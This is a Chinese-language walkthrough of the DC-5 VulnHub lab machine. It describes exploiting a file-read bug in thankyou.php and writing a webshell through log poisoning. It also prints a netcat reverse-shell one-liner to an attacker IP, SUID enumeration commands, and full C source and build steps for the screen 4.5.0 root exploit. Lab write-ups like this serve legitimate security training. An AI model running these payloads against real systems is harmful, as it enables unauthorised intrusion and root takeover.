总结

下载地址

• DC-5.zip (Size: 521 MB)
• Download: http://www.five86.com/downloads/DC-5.zip
• Download (Mirror): https://download.vulnhub.com/dc/DC-5.zip

使用方法:解压后使用vm直接打开ova文件。

漏洞利用

信息收集

这里还是使用DC-1的方法

1.给靶机设置一个快照

2.fping -agq 192.168.1.0/24  使用fping快速扫描该网段中存活的机子

3.将靶机关闭重新扫描一下对比少的那个ip就是靶机的ip

4.使用快照快速将靶机恢复

注ip段要看自己的

 

我记得rpcbind服务是有一些漏洞但是这里先尝试看看网页中有什么漏洞。

这里我们看随便生成一个东西但是没有发现什么东西接下来我们去扫扫目录文件。

这里扫目录发现一些东西然后经过尝试就footer.php有一些奇怪这里之后就不清楚怎么搞了然后查看别人的wp才知道thankyou.php有一个file参数其中有一个任意文件读取漏洞。

 

写马

 这里在尝试从日志写马,但是这里修改User-Agent但是并没有马

 这里重新尝试在url位置写马这个写进去了接下来我们使用蚁剑连接

提权

因为权限不高我们这里反弹shell因为蚁剑的虚拟终端是伪shell还是十分难受的

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.12 4444 >/tmp/f

反弹shell回来然后使用python继续搞。

 

 这里先尝试sudo -l,没有任何东西然后根目录发现什么东西这里来到用户目录只有一个dc进去没有什么东西然后ls -al然后有点东西但是没有什么用。

 

接下来我们尝试内核提权也是没有什么东西这里在看看suid提权

find / -user root -perm -4000 -exec ls -ldb {} \;
find / -perm /4000 2>/dev/null

 

这里有一个很可疑的命令/bin/screen-4.5.0这里我们查询一下这里就直接查询到了一个sceen 4.5.0 exp

这里我们打开他给的sh文件这里提供了方法我们先将里面提供的c语言代码拿出来

这里文件是先在自己的kali搞

注所有文件我是放到tmp文件夹里面的

libhax.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

 rootshell.c

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}

//编译一下
gcc -fPIC -shared -ldl -o libhax.so libhax.c

//编译rootshell
gcc -o /tmp/rootshell /tmp/rootshell.c

 text.sh

 这里我们通过蚁剑将text.sh还有编译好的rootshell和libhax.so上传上去

 然后chmod 777 text.sh

./text.sh就提权到了root